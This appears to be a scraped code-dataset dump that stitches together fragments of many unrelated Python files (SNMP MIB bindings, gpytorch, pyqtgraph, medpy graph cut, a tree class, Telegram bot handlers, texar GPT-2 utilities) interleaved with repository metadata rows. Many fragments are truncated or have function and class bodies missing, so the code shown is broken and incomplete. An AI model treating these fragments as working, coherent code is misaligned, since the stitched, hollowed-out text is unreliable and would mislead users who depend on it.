mibBuilder.exportSymbols("ZYXEL-AclV2-MIB", zyAclV2ClassifierInnerVlanMap1k=zyAclV2ClassifierInnerVlanMap1k, zyAclV2ClassifierIPv6DSCP=zyAclV2ClassifierIPv6DSCP, zyAclV2ClassifierEthernetInner8021pPriority=zyAclV2ClassifierEthernetInner8021pPriority, zyAclV2ClassifierInnerVlanMap4k=zyAclV2ClassifierInnerVlanMap4k, zyAclV2ClassifierEthernetPacketFormat=zyAclV2ClassifierEthernetPacketFormat, zyAclV2ClassifierVlanMap2k=zyAclV2ClassifierVlanMap2k, zyxelAclV2PolicyStatus=zyxelAclV2PolicyStatus, zyAclV2PolicyClassifier=zyAclV2PolicyClassifier, zyxelAclV2ClassifierInnerVlanTable=zyxelAclV2ClassifierInnerVlanTable, zyAclV2ClassifierIpEstablishOnly=zyAclV2ClassifierIpEstablishOnly, zyAclV2ClassifierEthernetType=zyAclV2ClassifierEthernetType, zyAclV2ClassifierEthernetSourceMacAddress=zyAclV2ClassifierEthernetSourceMacAddress, zyAclV2ClassifierIpSourceIpMaskBits=zyAclV2ClassifierIpSourceIpMaskBits, zyAclV2ClassifierEthernetDestinationMacAddress=zyAclV2ClassifierEthernetDestinationMacAddress, zyAclV2PolicyOutOfProfileDSCP=zyAclV2PolicyOutOfProfileDSCP, zyAclV2ClassifierIpDestinationSocketRangeEnd=zyAclV2ClassifierIpDestinationSocketRangeEnd, zyAclV2PolicyEgressPort=zyAclV2PolicyEgressPort, zyAclV2PolicyRowstatus=zyAclV2PolicyRowstatus, zyAclV2ClassifierEthernetSourceTrunks=zyAclV2ClassifierEthernetSourceTrunks, zyxelAclV2ClassifierInnerVlanEntry=zyxelAclV2ClassifierInnerVlanEntry, zyAclV2ClassifierLogNotification=zyAclV2ClassifierLogNotification, zyAclV2PolicyOutgoingAction=zyAclV2PolicyOutgoingAction, zyAclV2ClassifierIpDestinationIpAddress=zyAclV2ClassifierIpDestinationIpAddress, zyAclV2PolicyMeteringState=zyAclV2PolicyMeteringState, zyAclV2ClassifierInnerVlanMap2k=zyAclV2ClassifierInnerVlanMap2k, zyAclV2ClassifierIpPrecedence=zyAclV2ClassifierIpPrecedence, zyAclV2PolicyVid=zyAclV2PolicyVid, zyxelAclV2ClassifierEntry=zyxelAclV2ClassifierEntry, zyAclV2ClassifierIpDestinationIpMaskBits=zyAclV2ClassifierIpDestinationIpMaskBits, zyxelAclV2Notifications=zyxelAclV2Notifications, 
zyxelAclV2PolicyTable=zyxelAclV2PolicyTable, zyxelAclV2ClassifierMatchOrder=zyxelAclV2ClassifierMatchOrder, zyAclV2ClassifierIpDSCP=zyAclV2ClassifierIpDSCP, zyAclV2ClassifierWeight=zyAclV2ClassifierWeight, zyAclV2ClassifierMatchCount=zyAclV2ClassifierMatchCount, zyAclV2PolicyPriorityAction=zyAclV2PolicyPriorityAction, zyAclV2TrapClassifierLogMatchCount=zyAclV2TrapClassifierLogMatchCount, zyxelAclV2ClassifierEthernetEntry=zyxelAclV2ClassifierEthernetEntry, zyAclV2ClassifierIpPacketLenRangeStart=zyAclV2ClassifierIpPacketLenRangeStart, zyAclV2ClassifierEthernetSourceMACMask=zyAclV2ClassifierEthernetSourceMACMask, zyAclV2ClassifierEthernetDestinationMACMask=zyAclV2ClassifierEthernetDestinationMACMask, zyAclV2ClassifierVlanMap3k=zyAclV2ClassifierVlanMap3k, zyAclV2ClassifierTimeRange=zyAclV2ClassifierTimeRange, zyxelAclV2ClassifierIpv6Entry=zyxelAclV2ClassifierIpv6Entry, zyAclV2ClassifierIPv6EstablishOnly=zyAclV2ClassifierIPv6EstablishOnly, zyAclV2ClassifierIPv6DestinationIpPrefixLength=zyAclV2ClassifierIPv6DestinationIpPrefixLength, zyxelAclV2ClassifierIpEntry=zyxelAclV2ClassifierIpEntry, zyAclV2ClassifierIpToS=zyAclV2ClassifierIpToS, zyAclV2ClassifierEthernetSourcePorts=zyAclV2ClassifierEthernetSourcePorts, zyAclV2PolicyQueueAction=zyAclV2PolicyQueueAction, zyAclV2ClassifierIPv6NextHeader=zyAclV2ClassifierIPv6NextHeader, zyAclV2ClassifierVlanMap4k=zyAclV2ClassifierVlanMap4k, zyAclV2ClassifierEthernet8021pPriority=zyAclV2ClassifierEthernet8021pPriority, zyxelAclV2TrapInfoObjects=zyxelAclV2TrapInfoObjects, zyxelAclV2ClassifierIpTable=zyxelAclV2ClassifierIpTable, zyAclV2ClassifierIPv6SourceIpAddress=zyAclV2ClassifierIPv6SourceIpAddress, zyxelAclV2ClassifierLoggingState=zyxelAclV2ClassifierLoggingState, zyxelAclV2=zyxelAclV2, zyxelAclV2ClassifierIpv6Table=zyxelAclV2ClassifierIpv6Table, zyAclV2PolicyDiffServAction=zyAclV2PolicyDiffServAction, zyAclV2ClassifierIpDestinationSocketRangeStart=zyAclV2ClassifierIpDestinationSocketRangeStart, 
zyAclV2ClassifierVlanMap1k=zyAclV2ClassifierVlanMap1k, zyAclV2PolicyDSCP=zyAclV2PolicyDSCP, zyxelAclV2ClassifierEthernetTable=zyxelAclV2ClassifierEthernetTable, zyAclV2ClassifierLogState=zyAclV2ClassifierLogState, zyAclV2ClassifierInnerVlanMap3k=zyAclV2ClassifierInnerVlanMap3k, zyAclV2ClassifierIPv6SourceIpPrefixLength=zyAclV2ClassifierIPv6SourceIpPrefixLength, zyAclV2PolicyBandwidth=zyAclV2PolicyBandwidth, zyxelAclV2ClassifierLoggingInterval=zyxelAclV2ClassifierLoggingInterval, zyAclV2Policy8021pPriority=zyAclV2Policy8021pPriority, zyAclV2PolicyForwardingAction=zyAclV2PolicyForwardingAction, zyAclV2PolicyName=zyAclV2PolicyName, PYSNMP_MODULE_ID=zyxelAclV2, zyAclV2ClassifierName=zyAclV2ClassifierName, zyAclV2ClassifierIPv6DestinationIpAddress=zyAclV2ClassifierIPv6DestinationIpAddress, zyAclV2ClassifierState=zyAclV2ClassifierState, zyxelAclV2ClassifierVlanEntry=zyxelAclV2ClassifierVlanEntry, zyAclV2PolicyState=zyAclV2PolicyState, zyAclV2ClassifierIpSourceIpAddress=zyAclV2ClassifierIpSourceIpAddress, zyxelAclV2ClassifierTable=zyxelAclV2ClassifierTable, zyxelAclV2ClassifierStatus=zyxelAclV2ClassifierStatus, zyAclV2ClassifierIpSourceSocketRangeEnd=zyAclV2ClassifierIpSourceSocketRangeEnd, zyAclV2PolicyTOS=zyAclV2PolicyTOS, zyAclV2ClassifierIpPacketLenRangeEnd=zyAclV2ClassifierIpPacketLenRangeEnd, zyxelAclV2PolicyEntry=zyxelAclV2PolicyEntry, zyAclV2ClassifierIpProtocol=zyAclV2ClassifierIpProtocol, zyxelAclV2ClassifierVlanTable=zyxelAclV2ClassifierVlanTable, zyAclV2PolicyOutOfProfileAction=zyAclV2PolicyOutOfProfileAction, zyAclV2ClassifierIpSourceSocketRangeStart=zyAclV2ClassifierIpSourceSocketRangeStart, zyAclV2ClassifierCountState=zyAclV2ClassifierCountState)
| 144.324742 | 5,641 | 0.792314 |
c76ca1375282328ef3e6038f93b1edf1d46d7f49 | 1,728 | py | Python | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python2.7
import unittest
import canning
if __name__ == "__main__":
unittest.main()
| 30.315789 | 100 | 0.609375 |
c76d58f2d02929d5eb4690fddd86e4d2f3a6dc3d | 244 | py | Python | Exercicios/ex061.py | jlsmirandela/Curso_Python | 2419b68d335a2a42beb3e98fb93552aca1264cae | [
"MIT"
] | null | null | null | Exercicios/ex061.py | jlsmirandela/Curso_Python | 2419b68d335a2a42beb3e98fb93552aca1264cae | [
"MIT"
] | null | null | null | Exercicios/ex061.py | jlsmirandela/Curso_Python | 2419b68d335a2a42beb3e98fb93552aca1264cae | [
"MIT"
] | null | null | null | print('-+-' *10)
print(' GERADOR DE PA')
print('+-+' * 10)
c = 1
ter = int(input('Insira o primeiro termo - '))
rz = int(input('Insira a razo - '))
while c <= 10:
print(ter, ' ', end=' ')
ter += rz
c += 1
print('FIM')
| 14.352941 | 46 | 0.487705 |
c76e7fcaeb2193c977b2c4ee81febf00b7763cee | 2,175 | py | Python | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | 1 | 2019-09-30T06:51:03.000Z | 2019-09-30T06:51:03.000Z | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | null | null | null | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | 1 | 2020-09-16T16:35:27.000Z | 2020-09-16T16:35:27.000Z | #!/usr/bin/env python3
from .gp import GP
from .pyro import _PyroMixin # This will only contain functions if Pyro is installed
| 38.157895 | 114 | 0.593563 |
c76ec369645b0f101be129ffedbb1f290be5f94b | 510 | py | Python | tests/test_ping.py | d-wysocki/flask-resty | 2a5e7d7ea7e2130dce44b8f50625df72ad0dcd19 | [
"MIT"
] | 86 | 2015-11-25T07:09:10.000Z | 2022-02-15T19:40:30.000Z | tests/test_ping.py | d-wysocki/flask-resty | 2a5e7d7ea7e2130dce44b8f50625df72ad0dcd19 | [
"MIT"
] | 180 | 2015-11-24T23:02:53.000Z | 2022-03-31T04:05:38.000Z | tests/test_ping.py | d-wysocki/flask-resty | 2a5e7d7ea7e2130dce44b8f50625df72ad0dcd19 | [
"MIT"
] | 17 | 2015-12-28T11:05:47.000Z | 2022-03-15T12:10:02.000Z | import pytest
from flask_resty import Api
from flask_resty.testing import assert_response
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def test_ping(base_client):
response = base_client.get("/ping")
assert_response(response, 200)
assert response.get_data(as_text=True) == ""
| 23.181818 | 79 | 0.490196 |
c76f8dffc967eba49049f65ff4df98887b137c0d | 1,476 | py | Python | tests/test_vetters.py | pllim/exovetter | 75c6ca609331c04a55c0a6b4c858be71a4dfdfea | [
"MIT",
"BSD-3-Clause"
] | null | null | null | tests/test_vetters.py | pllim/exovetter | 75c6ca609331c04a55c0a6b4c858be71a4dfdfea | [
"MIT",
"BSD-3-Clause"
] | null | null | null | tests/test_vetters.py | pllim/exovetter | 75c6ca609331c04a55c0a6b4c858be71a4dfdfea | [
"MIT",
"BSD-3-Clause"
] | null | null | null | from numpy.testing import assert_allclose
from astropy.io import ascii
from astropy import units as u
import lightkurve as lk
from exovetter import const as exo_const
from exovetter import vetters
from exovetter.tce import Tce
from astropy.utils.data import get_pkg_data_filename
| 25.894737 | 71 | 0.638889 |
c770f106a56c64793bd9f4e329f2b5bb1fbfddef | 4,270 | py | Python | pyqtgraph/dockarea/DockDrop.py | hishizuka/pyqtgraph | 4820625d93ffb41f324431d0d29b395cf91f339e | [
"MIT"
] | 2,762 | 2015-01-02T14:34:10.000Z | 2022-03-30T14:06:07.000Z | pyqtgraph/dockarea/DockDrop.py | hishizuka/pyqtgraph | 4820625d93ffb41f324431d0d29b395cf91f339e | [
"MIT"
] | 1,901 | 2015-01-12T03:20:30.000Z | 2022-03-31T16:33:36.000Z | pyqtgraph/dockarea/DockDrop.py | hishizuka/pyqtgraph | 4820625d93ffb41f324431d0d29b395cf91f339e | [
"MIT"
] | 1,038 | 2015-01-01T04:05:49.000Z | 2022-03-31T11:57:51.000Z | # -*- coding: utf-8 -*-
from ..Qt import QtCore, QtGui
| 32.348485 | 91 | 0.525527 |
c7723eb15222900f00b69a2e3a6fb1a9708b8d3e | 871 | py | Python | data/download.py | pyaf/google-ai-open-images-object-detection-track | 3dd19aeeca5eea07de341ade59d1513fda4597ee | [
"MIT"
] | null | null | null | data/download.py | pyaf/google-ai-open-images-object-detection-track | 3dd19aeeca5eea07de341ade59d1513fda4597ee | [
"MIT"
] | null | null | null | data/download.py | pyaf/google-ai-open-images-object-detection-track | 3dd19aeeca5eea07de341ade59d1513fda4597ee | [
"MIT"
] | null | null | null | import os
from subprocess import call
files = ['000002b66c9c498e.jpg', '000002b97e5471a0.jpg', '000002c707c9895e.jpg', '0000048549557964.jpg', '000004f4400f6ec5.jpg', '0000071d71a0a6f6.jpg', '000013ba71c12506.jpg', '000018acd19b4ad3.jpg', '00001bc2c4027449.jpg', '00001bcc92282a38.jpg', '0000201cd362f303.jpg', '000020780ccee28d.jpg', '000023aa04ab09ed.jpg', '0000253ea4ecbf19.jpg', '000025ea48cab6fc.jpg', '0000271195f2c007.jpg', '0000286a5c6a3eb5.jpg', '00002b368e91b947.jpg', '00002f4ff380c64c.jpg', '0000313e5dccf13b.jpg', '000032046c3f8371.jpg', '00003223e04e2e66.jpg', '0000333f08ced1cd.jpg']
for file in files:
if not os.path.exists('train/' + file + '.jpg'):
spath = "gs://open-images-dataset/train/%s " % file
call(["gsutil", "cp", spath, 'train/'])
print(file, 'done', 'count:')
else:
print(file, 'already downloaded')
| 67 | 560 | 0.712974 |
c773836d5d08ecba5ffb7e86e3b25bdc07e2351a | 3,927 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/SNMP_FRAMEWORK_MIB.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/SNMP_FRAMEWORK_MIB.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/SNMP_FRAMEWORK_MIB.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2020-07-22T04:04:44.000Z | 2020-07-22T04:04:44.000Z | """ SNMP_FRAMEWORK_MIB
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
| 28.456522 | 158 | 0.595111 |
c773cb05d9fdb9aa7ea5543ac5440822be912b9e | 2,941 | py | Python | handlers/redirects.py | Bainky/Ventify | 638486dc5f265a4907a5a193ea2a7c9b44e8e943 | [
"MIT"
] | 6 | 2021-03-11T11:43:17.000Z | 2021-12-08T05:26:20.000Z | handlers/redirects.py | Bainky/Ventify | 638486dc5f265a4907a5a193ea2a7c9b44e8e943 | [
"MIT"
] | null | null | null | handlers/redirects.py | Bainky/Ventify | 638486dc5f265a4907a5a193ea2a7c9b44e8e943 | [
"MIT"
] | 2 | 2021-03-24T05:31:12.000Z | 2021-04-13T22:03:11.000Z | from aiogram.utils.markdown import hide_link
from aiogram.types import CallbackQuery
from loader import dp
from utils import (
get_object,
get_attributes_of_object
)
from keyboards import (
anime_choose_safe_category,
anime_sfw_categories,
anime_nsfw_categories,
animals_categories,
menu_with_categories,
control_buttons
)
| 23.717742 | 61 | 0.598776 |
c77456702d5939c9da605c3d65de2f70c1b95b26 | 8,695 | py | Python | segmentation_test/Scripts/medpy_graphcut_voxel.py | rominashirazi/SpineSegmentation | fb08122ac6d9a598b60aecb4f1a1a2a31fba96ab | [
"MIT"
] | null | null | null | segmentation_test/Scripts/medpy_graphcut_voxel.py | rominashirazi/SpineSegmentation | fb08122ac6d9a598b60aecb4f1a1a2a31fba96ab | [
"MIT"
] | null | null | null | segmentation_test/Scripts/medpy_graphcut_voxel.py | rominashirazi/SpineSegmentation | fb08122ac6d9a598b60aecb4f1a1a2a31fba96ab | [
"MIT"
] | null | null | null | #!c:\users\hooma\documents\github\spinesegmentation\segmentation_test\scripts\python.exe
"""
Execute a graph cut on a voxel image based on some foreground and background markers.
Copyright (C) 2013 Oskar Maier
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# build-in modules
from argparse import RawTextHelpFormatter
import argparse
import logging
import os
# third-party modules
import scipy
# path changes
# own modules
from medpy.core import ArgumentError, Logger
from medpy.io import load, save, header
from medpy import graphcut
from medpy.graphcut.wrapper import split_marker
# information
__author__ = "Oskar Maier"
__version__ = "r0.3.1, 2012-03-23"
__email__ = "oskar.maier@googlemail.com"
__status__ = "Release"
__description__ = """
Perform a binary graph cut using Boykov's max-flow/min-cut algorithm.
This implementation does only compute a boundary term and does not use
any regional term. The desired boundary term can be selected via the
--boundary argument. Depending on the selected term, an additional
image has to be supplied as badditional.
In the case of the difference of means, it is the original image.
Furthermore the algorithm requires a binary image with foreground
markers and a binary image with background markers.
Additionally a filename for the created binary mask marking foreground
and background has to be supplied.
Note that the input images must be of the same dimensionality,
otherwise an exception is thrown.
Note to take into account the input images orientation.
Note that the quality of the resulting segmentations depends also on
the quality of the supplied markers.
Copyright (C) 2013 Oskar Maier
This program comes with ABSOLUTELY NO WARRANTY; This is free software,
and you are welcome to redistribute it under certain conditions; see
the LICENSE file or <http://www.gnu.org/licenses/> for details.
"""
# code
def getArguments(parser):
"Provides additional validation of the arguments collected by argparse."
return parser.parse_args()
def getParser():
"Creates and returns the argparse parser object."
parser = argparse.ArgumentParser(description=__description__, formatter_class=RawTextHelpFormatter)
parser.add_argument('sigma', type=float, help='The sigma required for the boundary terms.')
parser.add_argument('badditional', help='The additional image required by the boundary term. See there for details.')
parser.add_argument('markers', help='Image containing the foreground (=1) and background (=2) markers.')
parser.add_argument('output', help='The output image containing the segmentation.')
parser.add_argument('--boundary', default='diff_exp', help='The boundary term to use. Note that the ones prefixed with diff_ require the original image, while the ones prefixed with max_ require the gradient image.', choices=['diff_linear', 'diff_exp', 'diff_div', 'diff_pow', 'max_linear', 'max_exp', 'max_div', 'max_pow'])
parser.add_argument('-s', dest='spacing', action='store_true', help='Set this flag to take the pixel spacing of the image into account. The spacing data will be extracted from the baddtional image.')
parser.add_argument('-f', dest='force', action='store_true', help='Set this flag to silently override files that exist.')
parser.add_argument('-v', dest='verbose', action='store_true', help='Display more information.')
parser.add_argument('-d', dest='debug', action='store_true', help='Display debug information.')
return parser
if __name__ == "__main__":
main() | 47.513661 | 328 | 0.692237 |
c774862e87bf8aaea6f4bb5796d15dd56dc9ae0b | 2,968 | py | Python | _notes/book/conf.py | AstroMatt/astronaut-training-en | 6250af8e10358016dcebee54bb9ad5bc40cfe4d1 | [
"MIT"
] | 1 | 2020-08-08T00:37:28.000Z | 2020-08-08T00:37:28.000Z | _notes/book/conf.py | AstroMatt/astronaut-training-en | 6250af8e10358016dcebee54bb9ad5bc40cfe4d1 | [
"MIT"
] | null | null | null | _notes/book/conf.py | AstroMatt/astronaut-training-en | 6250af8e10358016dcebee54bb9ad5bc40cfe4d1 | [
"MIT"
] | null | null | null | author = 'Matt Harasymczuk'
email = 'matt@astrotech.io'
project = 'Astronaut Training Program'
description = 'Astronaut Training Program'
extensions = [
'sphinx.ext.todo',
'sphinx.ext.imgmath',
]
todo_emit_warnings = False
todo_include_todos = True
exclude_patterns = []
# -----------------------------------------------------------------------------
# Standard book config
# -----------------------------------------------------------------------------
import os
import re
import subprocess
import sys
from datetime import datetime
needs_sphinx = '2.2'
mathjax_path = 'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML'
mathjax_config = {
'extensions': ['tex2jax.js'],
'jax': ['input/TeX', 'output/HTML-CSS'],
}
html_theme = 'sphinx_rtd_theme'
exclude_patterns = exclude_patterns + [
'.*',
'venv*',
'virtualenv*',
'_extensions',
'_img',
'_slides',
'_static',
'_themes',
'_tmp',
'*/_template.rst',
'*/contrib/*',
'*/solution/*',
'*/solutions/*',
'**.ipynb_checkpoints',
'README.rst',
'TODO.rst',
]
numfig_format = {
'section': 'Sect. %s.',
'figure': 'Fig. %s.',
'table': 'Tab. %s.',
'code-block': 'Code Listing %s.',
}
language = 'en'
source_directory = '.'
master_doc = 'index'
highlight_language = 'python3'
pygments_style = 'borland'
numfig = True
templates_path = ['_templates']
source_suffix = ['.rst']
imgmath_image_format = 'svg'
today_fmt = '%Y-%m-%d'
project_slug = re.sub(r'[\W]+', '', project)
sha1 = subprocess.Popen('git log -1 --format="%h"', stdout=subprocess.PIPE, shell=True).stdout.read().decode().replace('\n', '')
now = datetime.now()
year = now.year
today = now.strftime('%Y-%m-%d')
version = f'#{sha1}, {today}'
release = f'#{sha1}, {today}'
copyright = f'{year}, {author} <{email}>'
extensions_dir = os.path.join(os.path.dirname(__file__), '', '_extensions')
sys.path.append(extensions_dir)
htmlhelp_basename = project
html_theme_path = ['_themes']
html_static_path = ['_static']
html_favicon = '_static/favicon.png'
html_sidebars = {'sidebar': ['localtoc.html', 'sourcelink.html', 'searchbox.html']}
html_show_sphinx = False
html_context = {
'css_files': [
'_static/theme-overrides.css',
],
}
latex_documents = [(master_doc, f'{project_slug}.tex', project, author, 'manual')]
latex_elements = {
'papersize': 'a4paper',
'pointsize': '10pt',
'figure_align': 'htbp',
# Fix for: LaTeX Backend Fails with Citations In Figure Captions
'preamble': r"""
\usepackage{etoolbox}
\AtBeginEnvironment{figure}{\renewcommand{\phantomsection}{}}
"""
}
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
epub_exclude_files = ['search.html']
man_pages = [
(master_doc, project_slug, project, [author], 1)
]
texinfo_documents = [
(master_doc, project_slug, project, author, project, '', 'Miscellaneous'),
]
| 24.130081 | 128 | 0.624326 |
c774cc70f7362fd8daf5037ff3abf0db4ccef896 | 221 | py | Python | tutorial_application/forms.py | yamasakih/django_rdkit_tutorial | 9ac591963976da38cae962de2b98702bbb919cf4 | [
"MIT"
] | 2 | 2018-12-04T00:01:26.000Z | 2021-03-25T08:28:06.000Z | tutorial_application/forms.py | yamasakih/django-rdkit-tutorial | 9ac591963976da38cae962de2b98702bbb919cf4 | [
"MIT"
] | null | null | null | tutorial_application/forms.py | yamasakih/django-rdkit-tutorial | 9ac591963976da38cae962de2b98702bbb919cf4 | [
"MIT"
] | null | null | null | from django_rdkit import models
from django.forms.models import ModelForm
from .models import Compound
| 18.416667 | 41 | 0.723982 |
c775a30ea8b55f2cd0df98a3a7cc00417a074bda | 18,286 | py | Python | data_structures/trees/tree.py | onyonkaclifford/data-structures-and-algorithms | e0ca4bfa878273d06bf22c303e47762b8ec3870b | [
"MIT"
] | null | null | null | data_structures/trees/tree.py | onyonkaclifford/data-structures-and-algorithms | e0ca4bfa878273d06bf22c303e47762b8ec3870b | [
"MIT"
] | null | null | null | data_structures/trees/tree.py | onyonkaclifford/data-structures-and-algorithms | e0ca4bfa878273d06bf22c303e47762b8ec3870b | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from typing import Any, Generator, Iterable, List, Union
def is_root(self, position: _Position) -> bool:
"""Check if the passed position contains the root node. Time complexity: O(1).
:returns: True if the passed position holds the root node, else False
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
node = position.manipulate_node(self, "_validate_node")
return node.parent is None
def is_leaf(self, position: _Position) -> bool:
"""Check if the passed position contains a leaf. Time complexity: O(1).
:returns: True if the passed position holds a leaf node, else False
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
return len(self.get_children(position)) == 0
def get_root(self) -> Union[_Position, None]:
"""Return the root position. Time complexity: O(1).
:returns: the root position
"""
if self.is_empty():
return None
else:
return Tree._Position(self, self._root)
def get_parent(self, position: _Position) -> Union[_Position, None]:
"""Return the parent of the given position. Time complexity: O(1).
:param position: position containing the node whose parent is being sought
:returns: the position of parent of the node contained in the passed position. None if the position passed
contains the root node.
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
node = position.manipulate_node(self, "_validate_node")
if self.is_root(Tree._Position(self, node)):
return None
else:
return Tree._Position(self, node.parent)
def get_children(self, position: _Position) -> Union[List[_Position], None]:
"""Return the children of the given position. Time complexity: O(1).
:param position: position containing the node whose children are being sought
:returns: the positions of the children of the node contained in the passed position. None if the position has
no children.
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
node = position.manipulate_node(self, "_validate_node")
children = node.children
if children is None:
return None
else:
return [Tree._Position(self, i) for i in children if i is not None]
def get_siblings(self, position: _Position) -> Union[List[_Position], None]:
"""Return the siblings of the given position. Time complexity: O(1).
:param position: position containing the node whose children are being sought
:returns: the positions of the siblings of the node contained in the passed position
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
node = position.manipulate_node(self, "_validate_node")
parent = node.parent
if parent is None:
return []
return [Tree._Position(self, i) for i in parent.children if i is not node]
def get_height_of_node(self, position: _Position) -> int:
"""Return the number of edges between a node and the farthest leaf among its descendants. Time complexity:
O(n).
:param position: position containing the node whose height is being sought
:returns: the number of edges between a node and the farthest leaf among its descendants
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
if self.is_leaf(position):
return 0
return 1 + max(self.get_height_of_node(p) for p in self.get_children(position))
def get_height_of_tree(self) -> int:
"""Return the number of edges between the root node and the farthest leaf. Time complexity: O(n).
:returns: the number of edges between the root node and the farthest leaf
"""
if self.is_empty():
raise Empty("Tree is empty")
return self.get_height_of_node(Tree._Position(self, self._root))
def get_depth_of_node(self, position: _Position) -> int:
"""Return the number of edges between a node and the root. Time complexity: O(n).
:param position: position containing the node whose depth is being sought
:returns: the number of edges between a node and the root
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
if self.is_root(position):
return 0
return 1 + self.get_depth_of_node(self.get_parent(position))
def get_depth_of_tree(self) -> int:
"""Return the number of edges between the farthest leaf and the root. Time complexity: O(n).
:returns: the number of edges between the farthest leaf and the root
"""
return self.get_height_of_tree()
def get_level_of_node(self, position: _Position) -> int:
"""Return the number of nodes between a node and the root, inclusive of itself. Time complexity: O(n).
:param position: position containing the node whose level is being sought
:returns: the number of nodes between a node and the root, inclusive of itself
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
return 1 + self.get_depth_of_node(position)
def traverse_subtree_pre_order(self, position: _Position) -> Generator:
"""Pre-order traverse subtree whose root is the passed position and return a generator of the positions it
contains
:param position: position containing the node that's the root of the subtree to be traversed
:returns: a generator of the positions
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
yield position
for i in self.get_children(position):
for j in self.traverse_subtree_pre_order(i):
yield j
def delete(self, position: _Position) -> None:
"""Delete a value from the tree
:param position: position containing the node to be removed from the tree
"""
self._length -= 1
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
node = position.manipulate_node(self, "_validate_node")
is_root_node = self.is_root(position)
_ = position.manipulate_variables(self, "_invalidate_position")
delete_node(node, is_root_node)
| 39.240343 | 119 | 0.626107 |
c775ae8fda6ca73f18c286d16c2c597ac2a87d30 | 6,857 | py | Python | nodes/audio.py | sddhrthrt/COVFEFE | bc74ff0b5ee4d675482928110dda81443d4bec63 | [
"Apache-2.0"
] | null | null | null | nodes/audio.py | sddhrthrt/COVFEFE | bc74ff0b5ee4d675482928110dda81443d4bec63 | [
"Apache-2.0"
] | null | null | null | nodes/audio.py | sddhrthrt/COVFEFE | bc74ff0b5ee4d675482928110dda81443d4bec63 | [
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
import os
import logging
from nodes.helper import FileOutputNode
from utils import file_utils
from utils import signal_processing as sp
from utils.shell_run import shell_run
from config import OPENSMILE_HOME
| 36.865591 | 147 | 0.624763 |
c776010ff719981072eef5b7305ecf5eee272758 | 12,914 | py | Python | texar/torch/modules/pretrained/gpt2.py | VegB/VLN-Transformer | da1fa71e419d8d05c96749445230a77338edba09 | [
"Apache-2.0"
] | 19 | 2020-07-29T15:25:45.000Z | 2022-01-19T17:49:42.000Z | texar/torch/modules/pretrained/gpt2.py | VegB/VLN-Transformer | da1fa71e419d8d05c96749445230a77338edba09 | [
"Apache-2.0"
] | 3 | 2021-02-16T10:26:23.000Z | 2021-06-08T16:50:40.000Z | texar/torch/modules/pretrained/gpt2.py | VegB/VLN-Transformer | da1fa71e419d8d05c96749445230a77338edba09 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 The Texar Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utils of GPT2 Modules.
"""
import json
import os
import warnings
from abc import ABC
from typing import Any, Dict
import torch
from texar.torch.modules.pretrained.pretrained_base import PretrainedMixin
__all__ = [
"PretrainedGPT2Mixin",
]
_GPT2_PATH = "https://storage.googleapis.com/gpt-2/models/"
_CHECKPOINT_FILES = [
"checkpoint", "encoder.json", "hparams.json", "vocab.bpe",
"model.ckpt.data-00000-of-00001", "model.ckpt.index", "model.ckpt.meta"]
| 40.73817 | 80 | 0.533065 |
